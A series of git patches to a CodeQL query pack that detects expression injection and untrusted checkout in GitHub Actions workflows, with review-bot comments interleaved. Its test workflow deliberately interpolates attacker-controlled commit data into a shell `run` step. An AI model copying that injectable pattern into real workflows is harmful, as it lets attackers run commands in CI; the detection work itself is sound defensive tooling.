@@ -33,35 +37,39 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", - "\\bgithub\\s*\\.\\s*head_ref\\b" + "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") } bindingset[context] private predicate isExternalUserControlledComment(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") } bindingset[context] private predicate isExternalUserControlledGollum(string context) { - context - 
.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") + exists(string reg | + reg = + [ + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + ] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] 
@@ -69,26 +77,29 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") + 
exists(string reg | + reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -96,18 +107,18 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.workflow\\.path\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.workflow_run\\.display_title\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } From 0e50204672f05fdd33b115ff36a2c9f5c2c10bef Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:19:55 +0100 Subject: [PATCH 0094/1267] More regexp improvements --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++------ .../codeql/actions/dataflow/ExternalFlow.qll | 4 +- .../codeql/actions/dataflow/FlowSources.qll | 8 +-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 1 + .../CWE-020/CompositeActionsSources.ql | 1 + .../CWE-020/CompositeActionsSummaries.ql | 1 + .../CWE-020/ReusableWorkflowsSinks.ql | 1 + .../CWE-020/ReusableWorkflowsSources.ql | 1 + .../CWE-020/ReusableWorkflowsSummaries.ql | 1 + .../CWE-094/CriticalExpressionInjection.ql | 1 + .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 49 ++++++++++--------- 13 files changed, 59 insertions(+), 45 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 14f3cd2ecd9..7ebed407c0f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,5 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +private import codeql.actions.Ast::Utils as Utils /** * Gets the length of each line in the StringValue . @@ -833,9 +834,9 @@ class StepsExpressionImpl extends ContextExpressionImpl { string fieldName; StepsExpressionImpl() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } 
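Review bot: `internal/Ast.qll` now imports `codeql.actions.Ast::Utils`, while the earlier diff of `Ast.qll` on this page shows that file importing `codeql.actions.ast.internal.Ast`, so the internal library depends on the public one that wraps it. QL accepts cyclic imports, but the layering becomes harder to follow. Moving `Utils` into its own library file, or into the internal library and re-exporting it from `Ast.qll`, keeps the dependency in one direction.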
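Review bot: `Utils::normalizeExpr(expression)` is spelled out three times in the `StepsExpressionImpl` characteristic predicate, and the same repetition is added to the needs, jobs, inputs, env and matrix classes in the following hunks. Binding it once reads better and keeps the match and the captures on the same string: `exists(string norm | norm = Utils::normalizeExpr(expression) | norm.regexpMatch(stepsCtxRegex()) and stepId = norm.regexpCapture(stepsCtxRegex(), 1) and fieldName = norm.regexpCapture(stepsCtxRegex(), 2))`. Normalizing once where `expression` is assigned in `ExpressionImpl` would remove the calls altogether, provided `toString()` may show the normalized text.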
@@ -856,9 +857,9 @@ class NeedsExpressionImpl extends ContextExpressionImpl { string fieldName; NeedsExpressionImpl() { - expression.regexpMatch(needsCtxRegex()) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -886,9 +887,9 @@ class JobsExpressionImpl extends ContextExpressionImpl { string fieldName; JobsExpressionImpl() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -911,8 +912,8 @@ class InputsExpressionImpl extends ContextExpressionImpl { string fieldName; InputsExpressionImpl() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -936,8 +937,8 @@ class EnvExpressionImpl extends ContextExpressionImpl { string fieldName; EnvExpressionImpl() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -959,8 +960,8 @@ class MatrixExpressionImpl extends ContextExpressionImpl { string fieldName; MatrixExpressionImpl() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 008b5a19ce6..7e265fb2570 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,6 @@ private import internal.ExternalFlowExtensions as Extensions -import codeql.actions.DataFlow -import actions +private import codeql.actions.DataFlow +private import actions /** * MaD sources diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d3a96e1a2c7..a586cab4a32 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,7 @@ -import actions -import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow -import codeql.actions.Ast::Utils as Utils +private import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils /** * A data flow source. 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index fddf537ed1d..c10334436aa 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -2,10 +2,10 @@ * Provides classes representing various flow steps for taint tracking. */ -import actions +private import actions private import codeql.util.Unit private import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 1f90efa5bcc..0ea0713983d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec8..8e4275f27c7 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c..8b8b5af3c45 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow 
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index d84566dab04..31fbc1eaae2 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36fece..e5612d06343 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f..444ce028954 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 66a055634c7..e24b1ab9ddc 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow 
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad2..1e7414e5ce6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 438e3dfe7fc..c9ad93d18b2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
@@ -18,32 +18,37 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - Utils::normalizeExpr(this.getCondition()) - .regexpMatch([ - ".*github\\.actor.*", ".*github\\.triggering_actor.*", - ".*github\\.event\\.pull_request\\.user\\.login.*", - ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" - ]) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) } } bindingset[s] predicate containsHeadRef(string s) { - Utils::normalizeExpr(s) - .matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. + "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. 
+ "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. + "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) } /** Checkout of a Pull Request HEAD ref */ @@ -68,7 +73,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { or exists(string varname | containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - line.matches("%" + varname + "%") + exists(line.regexpFind(varname, _, _)) ) ) ) From 872b1f88f053dbb29a422f5fa0b33b3e0933a907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:47:19 +0100 Subject: [PATCH 0095/1267] More regexp improvements --- ql/lib/codeql/actions/Ast.qll | 9 +++++---- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- ql/src/Debug/partial.ql | 1 + .../Security/CWE-094/.github/workflows/test.yml | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 10 +++++----- .../Security/CWE-094/ExpressionInjection.expected | 10 +++++----- 6 files changed, 20 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3d675bebce0..143e89512fe 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
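Review bot: In `GitCheckout`, `line.regexpFind(varname, _, _)` uses the environment variable name as an unanchored, unescaped regular expression, so a variable named `REF` also matches a line that only mentions `GITHUB_REF`. Any regex metacharacter in the name would change the pattern too. The other patterns in this commit gained `\\b` anchors, and the same fits here: `exists(line.regexpFind("\\b" + varname + "\\b", _, _))`. That assumes variable names contain only word characters; if that is not guaranteed, the name should be escaped before it is used as a pattern. The enclosing characteristic predicate starts outside the hunk.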
@@ -5,10 +5,9 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.replaceAll("['", ".") - .replaceAll("']", "") - .replaceAll("[\"", ".") - .replaceAll("\"]", "") + //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } } @@ -45,6 +44,8 @@ class Expression extends AstNode instanceof ExpressionImpl { string getExpression() { result = expression } string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7ebed407c0f..b05dd852dbf 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -30,8 +30,8 @@ string getASimpleReferenceExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fb31fe20990..702a454645c 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -8,6 +8,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import PartialFlow::PartialPathGraph 
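Review bot: `normalizeExpr` rewrites a quoted index only when the quote directly follows `[`, so `github.event[ 'head_commit' ]` stays un-normalized and would slip past the source patterns that rely on this helper. That matters only if the expression syntax tolerates whitespace inside the brackets, which is not confirmed here. Allowing optional whitespace would close the gap, `regexpReplaceAll("\\[\\s*'([a-zA-Z0-9_\\*\\-]+)'\\s*\\]", ".$1")`, and likewise for the double-quoted form. The commented-out character class left inside the expression (the `//[A-Za-z0-9'...` line) should be removed. The predicate also needs a QLDoc comment saying that it rewrites quoted index access to dot access and removes whitespace around dots.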
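Review bot: The two patterns in `getASimpleReferenceExpression` are meant to be identical but differ: the `regexpCapture` one has `\\((\\)` where the `regexpFind` one has `\\(\\)`. Inside a character class the extra `(` is harmless, but it shows how two hand-edited copies drift, and this commit had to touch both. The capture step is also redundant, since group 1 wraps the whole pattern and `regexpFind` already returns the full match. `result = s.getValue().regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset)` would be enough. The predicate's signature and doc comment start outside the hunk.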
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 628b6e6f1bf..b9fa152e49a 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -12,7 +12,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event['head_commit']['message'] }} find: 'foo' replace: '' - id: step1 @@ -34,4 +34,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 38884b3eaef..dfed1edb40a 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
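Review bot: This fixture now exercises only the single-quoted index form (`github.event['head_commit']['message']`, `needs.job1.outputs['job_output']`), while `normalizeExpr` in the same commit also adds a branch for double-quoted indexes that no visible test covers. A step such as `- run: echo ${{ github.event["head_commit"]["message"] }}` in this workflow would pin that branch. Because the two lines replaced the dot-notation versions in place, it is worth checking that another fixture still covers the plain `needs.job1.outputs.job_output` form.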
@@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | 
@@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | 